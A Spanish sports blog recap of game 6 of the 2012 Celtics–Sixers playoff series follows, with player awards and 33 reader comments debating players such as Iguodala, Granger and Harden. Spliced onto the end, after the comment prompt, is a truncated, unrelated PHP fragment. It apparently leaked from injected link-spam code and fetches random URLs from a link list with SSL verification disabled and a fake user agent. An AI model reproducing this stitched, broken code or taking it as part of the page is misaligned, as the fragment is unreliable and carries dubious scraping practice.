La Crónica: Límite TD Garden

24 de May de 2012 por TheDeerHunter

Una derrota es el preludio de una victoria segura para los Sixers. 5-0 en tal contexto durante estos playoffs. En esta serie nadie ha logrado ganar dos partidos seguidos. No parece un gran augurio para ellos en el definitivo 7º en Boston. No podía concluir de otra manera.

Anoche, ante su público y con Allen Iverson de talismán recuperaron sensaciones defensivas volviendo al trabado y feo ritmo de los primeros choques. Desconectado Rondo, los Celtics acumularon más pérdidas que asistencias. Su juego interior sufrió por inanición y malos porcentajes, y Kevin Garnett se veía obligado a alejarse de la zona para anotar.

“Even though Kevin had points, it wasn’t the type of points we needed.”
Doc Rivers

Ray Allen estuvo flojo y con problemas de faltas y la segunda unidad se dio por desaparecida. Sólo se ha podido ver al Pierce habitual, con Iguodala incansable apretándole las clavijas.

No es que los Sixers fueran anoche la alegría de la huerta. Volvieron a perder la pelea bajo los tableros y se mostraron incapaces desde la larga distancia. Se colapsaron en el 2º cuarto al anotar tan sólo 11 puntos pero durante el resto del choque se las apañaron para anotar con cierta variedad y eficacia. A pesar del mal partido de Thaddeus, Meeks y Lavoy Allen mantuvieron 5 hombres en dobles figuras junto a Hawes que se quedó en 9 puntos. El mejor fue Jrue Holiday y estuvo bastante inspirado Lou Williams, cuya camiseta lucía anoche el mismísimo Iverson. Veremos si son capaces de mantener el nivel en el infierno verde.

PREMIOS

MVP: 20 puntos, 3 rebotes, 6 asistencias, jugadas claves en momento decisivos. Jrue Holiday está dando lo mejor de sí en estos playoffs.

Sorpresa: Andre Iguodala anotó el único triple de los Sixers. Su porcentaje desde la línea de 3 en esta serie (53%) es mejor que desde la línea de tiros libres (45%).

Decepción: Rajon Rondo había sido una pesadilla para los Sixers en los cinco partidos anteriores pero anoche se quedó en 9 puntos y 6 asistencias. A Ray Allen parece que ya no le recuperaremos del todo para la causa. Thaddeus Young disputó sólo 11 minutos en los que fue capaz de anotar un par de puntos.

Esfuerzo en vano: Ni Paul Pierce ni Kevin Garnett se encontraron cómodos durante todo el partido pero aportaron 44 puntos y 21 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

33 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Holiday promedia 16.3 puntos en las victorias de los Sixers, mientras que en las derrotas se queda en tan solo 11 tantos. Está tirando mejor desde fuera, con mejores promedios, y no deja de hacer todo lo que sabe hacer, que son muchas cosas. Vale que sus asistencias son ‘calderonianas’, es decir, penetro un poco aprovechando un bloqueo y la saco para el tío que está solo en la esquina, pero las sabe dar; además, su manejo de balón es bastante bueno y sabe aprovecharlo para generar algo, no la bota por botar. No sé, yo no diría que es un top 10 en bases de la liga, o si lo es sería el décimo más o menos, pero la verdad es que suele sumar bastante para el equipo y pierde muy pocos balones.

    Por otra parte, se nota que los Celtics están reventados, pero en el séptimo deben defender el Garden, pues va a ser su último esfuerzo como equipo, como Big Four, y no lo van a desaprovechar ni locos. Será un partido muy entretenido, porque Philadelphia tampoco esperaba jugarlo y ahora se ven a las puertas de la final de conferencia, después de más de una década de vagar por la mediocridad. No es descartable la sorpresa, pero si lo pensamos friamente… Garnett, Pierce, Allen y Rondo no se van a dejar pisar la manguera por un equipo tan joven y encima en casa. Imposible

      Citar

  2. melo15 dice:
    #2

    Ayer jugo Allen Iverson??

      Citar

  3. MagicJohnson32 dice:
    #3

    melo15:
    Ayer jugo Allen Iverson??

    No vi el partido, pero dado que ganaron los Sixers, deduzco que no, Iverson no jugó.

      Citar

  4. Sancho88 dice:
    #4

    Y Eric Snow?

      Citar

  5. TheDeerHunter dice:
    #5

    Me refería en la grada, mongolos XS

      Citar

  6. MagicJohnson32 dice:
    #6

    Sancho88:
    Y Eric Snow?

    ¿Aceptamos Eric Snow como jugador de baloncesto?

      Citar

  7. GreenPride dice:
    #7

    Bueno pues horrible 6º partido de la serie Celtics-Sixers. Como dice la crónica el mérito de los Sixers estuvo en meter el partido en el fango y jugarlo bajo mínimos. Sobrevivieron a un segundo cuarto donde los Celtics les perdonaron literalmente la vida y con fuerza y casta consiguieron voltear poco a poco para acabar ganando. La clave estuvo en el desacierto de los verdes que a pesar de ganar el rebote sólo tuvieron un 33% de acierto en los tiros. Sólo Garnett (en los 2 últimos cuartos) y Pierce vieron algo de aro, aunque con muchas dificultades y Rondo estuvo bastante espeso esta vez, siendo muy poco agresivo en sus entradas a canasta. Bass dió la de arena y en general a todo el equipo se le vió falto de ideas. Por Philadelphia sin hacer ni mucho menos un partido brillante, consiguieron contribuir todos un poco y acabar ganando la batalla.
    Visto cómo van estas series el ritmo influirá mucho en el 7º y definitivo. Está claro que los Sixers deben hacer un partido feo, de nula fiuidez ofensiva de los Celtics para llevarse el gato al agua. Deberán evitar sus pérdidas y apretar las clavijas atrás para intentar asaltar el Garden. Los Celtics deben defender bien y aprovechar esto para intentar hacer transiciones que les den ataques más claros. En Boston los árbitros dudo que permitan echar a Garnett de la zona como en el 6º así que en estático meter bolas a KG y conseguir liberar un poco a Pierce con bloqueos. Rondo debe ser agresivo en sus jugadas para crear espacios. Para mí los Celtics son muy favoritos por lo difícil que es ganar en Boston y más un 7º y sólo una falta flagrante de piernas podría tumbarles. Si no, yo creo que esta podría ser la última gran victoria del Big Four de los Celtics pues no les veo pudiendo pasar a las Finales con lo cascados que llegan. Para ellos sería importante que Bass tenga un día decente y que alguien de la segunda unidad pueda aportar en ataque (Stiemsma, Pietrus). Si puede jugar Bradley que yo creo que jugará también será un punto a su favor. Los orgullosos verdes se aprestan a la batalla en casa así que será un partido a no perderse con ese gran ambiente que se crea en Boston.
    Por cierto en la otra eliminatoria del Este, Haslem suspendido 1 partido y Pittman 3 partidos por sus flagrantes del 5º así que más superioridad interior para los Pacers. Veremos esta noche si son capaces de hacerla valer y forzar otro 7º del que yo veo muy difícil que pudieran pasar. Los Heat lo tienen muy bien para llegar a las finales la verdad

      Citar

  8. GreenPride dice:
    #8

    Más de la otra eliminatoria, Granger da negativo en su prueba así que podría jugar y él dice: “In my mind, I’m going to play, Elimination game, I have to play.” Vamos que va a jugar, veremos en qué condiciones lo hace. En cuanto a David West, también jugará. De cómo esten ambos dependerá mucho las posibilidades de forzar el 7º de los de Indiana. Lance Stephenson también estaba lesionado, pero a quién le importa…

      Citar

  9. Viva_Dirk dice:
    #9

    MagicJohnson32: ¿Aceptamos Eric Snow como jugador de baloncesto?

    Hombre si no hemos dicho nada con Iverson como no vamos a aceptar a Snow!

    🙂

      Citar

  10. Pop dice:
    #10

    MagicJohnson32: ¿Aceptamos Eric Snow como jugador de baloncesto?

    Hombre, Magic! Era uno de mis apodos montesianos favoritos. El aplicado, el obediente…

      Citar

  11. Esteban dice:
    #11

    Sancho88:
    Y Eric Snow?

    tuvo momentos muy buenos en su carrera, clave para llegar a las finales de la nba en el 2000, sus ultimos años como los de muchos fueron malos y eso queda en el recuerdo

      Citar

  12. Sancho88 dice:
    #12

    Sam Casell rules totalmente

      Citar

  13. Sancho88 dice:
    #13

    qui cir, seres extraterrestres que algún día conquistarán la tierra

      Citar

  14. Lucho dice:
    #14

    Quien es mejor, Granger o Igoudala?? A quien elegirian uds??
    Son maso menos comparables en cuanto a nivel no? Son los Boozer, Amar`e, Bosh de los aleros? 😛

      Citar

  15. Sancho88 dice:
    #15

    Iguodala, mil veces más líder, defensivo e irrespetuoso con las leyes de la naturaleza. Granger tiene a veces pinta de bollo de pan integral, es decir, te deja un sabo insípido y al verlo te entran ganas de cagarte por la pata abajo. Un litrico de sangre por favor para ese alero medio estrella, lo necesita…

      Citar

  16. rumbero dice:
    #16

    Como aprovechais la ocasión cada vez que sale el nombre de Iverson xD…es una batalla pérdida, pero a Eric Snow no me lo toqueis, si era el tercer espada del peor equipo que ha pisado unas finales en los últimos 20 años. Crack total

    Me quedo con Igoudala Lucho, mucho más jugador, y eso que a Granger le tengo un cariño especial desde que dijo que los españoles oliamos a ajo o que los europeos no usan desodorante…una mente brillante

      Citar

  17. MagicJohnson32 dice:
    #17

    Bueno, Iguodala es un defensor de elite y un gran distribuidor, aunque su nivel como referente ofensivo no pasa del de tercera espada.

    Granger… uff, un anotador que con 29 años lleva cuatro temporadas consecutivas bajando su anotación (y sus porcentajes, y sus asistencias), pues qué quieres que te diga. Sí, un Boozer de la vida.

      Citar

  18. Esteban dice:
    #18

    iguodala, es un mediocre jugador ofensivo, pero un exelente defensor
    mientras quew granger es medio en todo, algo buen tirador, algo buen penetrador, un dfensor del monton

    iguodala podria ser un segunda espada de un gran equipo si juega con un all star, mientras que granger a mi entender sera un tercer espada (detras de bynun y kobe, eso si que podria funcionar)

      Citar

  19. Lucho dice:
    #19

    Me quedo clarisimo chicos
    Gracias Sancho, rumbero, Magic y Esteban. Veo que estan todos de acuerdo

      Citar

  20. GreenPride dice:
    #20

    Entre Granger e Iguodala me quedo con Iguodala. Mucho mejor defensor, más inteso, más carácter ganador. Un muy buen jugador, no una estrella. Granger es más fino, pero bastante más apático, tendente a desaparecer, tendente a “se dejaba llevar”. Clase media de la liga… y por eso los Pacers no van a conseguir pasar la eliminatoria porque les falta un verdadero crack (que Iguodala tampoco es)

      Citar

  21. Lucho dice:
    #21

    Otro poroto para Iggy, jeje. A Paul George si lo ven con potencial (peor pero mas joven como dijeron el otro dia, como se lo define aca jaajaj) para superar a ambos??

      Citar

  22. Nacho dice:
    #22

    Sancho88: Iguodala, mil veces más líder, defensivo e irrespetuoso con las leyes de la naturaleza. Granger tiene a veces pinta de bollo de pan integral, es decir, te deja un sabo insípido y al verlo te entran ganas de cagarte por la pata abajo. Un litrico de sangre por favor para ese alero medio estrella, lo necesita…

    Cito de memoria, Sancho, pero creo que hace 15 días pedías selección para Granger.

      Citar

  23. Nacho dice:
    #23

    Los Celtics no es que sean viejos. Es que son abuelos con muletas. Y aún así, están donde están.
    Pierce está más lento, y casi es el que mejor está.
    Garnett parece vivir segunda juventud, pero como decía GreenPride, no está para pegarse mucho.
    Allen está casi más cascado que yo. Creo que jugó ayer porque no le quedaba otra. Para atacar el aro, un pase, porque es muy bueno. Pero para defender… y los Sixers lo aprovecharon poco.
    Si a esto unimos un mal partido de Bass y Rondo, y que Bradley está tocado, bastante hicieron con llegar al final con alguna, aunque mínima, opcion.
    Pero es que lo alucinante de estos tipos, es que son capaces de pasar a sus finales y ponérselo chungo, previsiblemente, a los Heat.
    Y mira que nunca fui fan de los verdes, pero estos últimos años, y más este, me han ganado para la causa. ¡Que se venga Pau al geríatrico!

      Citar

  24. Esteban dice:
    #24

    Lucho:
    Otro poroto para Iggy, jeje. A Paul George si lo ven con potencial (peor pero mas joven como dijeron el otro dia, como se lo define aca jaajaj) para superar a ambos??

    me he cansado de decirlo, george esta en su segundo año en la liga, ya tiene dos PO en sus espaldas y juega como un tio de 27 o 28 años

    no sera un talento ofensivo en elegancia, pero creo que es una version mejorada del mejor artest, una bestia en defensa capaz de marcar 4 posiciones, y un correcto anotador

    los pacers con hill, collison, george, tyler y hibbert tiene una base increible, todos jugadores de rol, con salarios asumibles, lo que hace a un equipo candidato por una decada, estilo spurs

    el problema de los pacers, son las dos estrellas que debrian guiar a sus jovenes jugadores de rol, y alli granger y west no son jugadores franquicia para llevarlos mas lejos que segunda ronda

    ya lo dije con wade uinicamente por granger estos pacers podrian ser campeones

      Citar

  25. Sancho88 dice:
    #25

    Nacho: Cito de memoria, Sancho, pero creo que hace 15 días pedías selección para Granger.

    Hombre, ambos son potencialmente seleccionables. Que me guste más Iggy no quiere decir que no admire la capacidad de anotación de Granger, pero en comparación… me crea muchas dudas en muchos aspectos. Yo al que vengo pidiendo selección toda la temporada es para Harden, pero por aquí no habéis querido comentar mi propuesta

      Citar

  26. melo15 dice:
    #26

    Pues para mi es mucho mejor Iggy, mas atletico, mejor defensor y mas lider, Granger, bueno es de la clase es de la clase media-alta de la liga, un buen segunda espada en mi opinion.
    Esteban si cambias a Pau por Love, los Lakers tambien serian campeones.

      Citar

  27. Esteban dice:
    #27

    melo15:
    Pues para mi es mucho mejor Iggy, mas atletico, mejor defensor y mas lider, Granger, bueno es de la clase es de la clase media-alta de la liga, un buen segunda espada en mi opinion.
    Esteban si cambias a Pau por Love, los Lakers tambien serian campeones.

    melo nunca propuse un trade de granger por wade, solo dije que si este equipo tendria a wade en el lugar de granger podrian ser campeones, lo que quise decir que por los 14 millones que cobra granger, en su lugar tuviera un verdadera primera espada, es lo unico que le faltaria,

    es una forma de decir que lo uinico que les falta a los pacers es un dos de verdad, en verdadero jugador franquicia, el resto ya esta

      Citar

  28. melo15 dice:
    #28

    Sancho no te pongas triste XD, bueno estan Wade y Kobe pero despues va harden, aunque con la cantidad de bases que hay no creo que vaya, porque Westbrook y Paul iran casi seguro y Deron casi tambien, y se contamos que Westbrook tambien puede jugar de escolta y mas en nivel FIBA, pues le veo pocas posibilidades a Harden, ademas tambien estan Gordon, Evans…

      Citar

  29. Heineken dice:
    #29

    melo15:
    Sancho no te pongas triste XD, bueno estan Wade y Kobe pero despues va harden, aunque con la cantidad de bases que hay no creo que vaya, porque Westbrook y Paul iran casi seguro y Deron casi tambien, y se contamos que Westbrook tambien puede jugar de escolta y mas en nivel FIBA, pues le veo pocas posibilidades a Harden, ademas tambien estan Gordon, Evans…

    Gordon y Evans a los JJOO?? En serio?? Yo creo que antes llevan a Michael Redd que a esos 2 jaja

      Citar

  30. nba dice:
    #30

    melo15:
    Pues para mi es mucho mejor Iggy, mas atletico, mejor defensor y mas lider, Granger, bueno es de la clase es de la clase media-alta de la liga, un buen segunda espada en mi opinion.
    Esteban si cambias a Pau por Love, los Lakers tambien serian campeones.

    Melo, y con cuantos balones tendrían que jugar los Lakers para que esto fuese posible, si ahora con Bryant y Bynum y Sessions a medio gas casi no tiene balones Pau, tu crees que Kobe permitiria que alguien tirase mas que el ??

      Citar

  31. Melo15 dice:
    #31

    Joder como os cebais XD, bueno eran solo ideas, pero Gordon ya fue a al Mundial, ya se que no es lo mismo pero era una opcion, con Evans se me ha ido un poco la olla.

    Bueno, pero este año cambiaban de entrenador y se reparten los balones mucho mejor, ademas Love es muy versatil y puede jugar de pivot tambien.

      Citar

  32. Esteban dice:
    #32

    harden es el tercer mejor escolta de la liga, con la caida en desgracia de manu este año

    pensar que muchos decian que el thunder le habia errado con dejar pasar a evans y elegir a harden

    muchachos, el thunder nunca se equivoca con el draft

      Citar

  33. melo15 dice:
    #33

    Esteban el Thunder es lo mismo que los Sonics, porque si no ahora mismoi te presentos su larga lista de pivots que no han llegado a ser lo que prometian, y si solo hablamos del Thunder, bueno pues tambien se han equivocado, sino mira lo malo que es Cole Aldrich

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>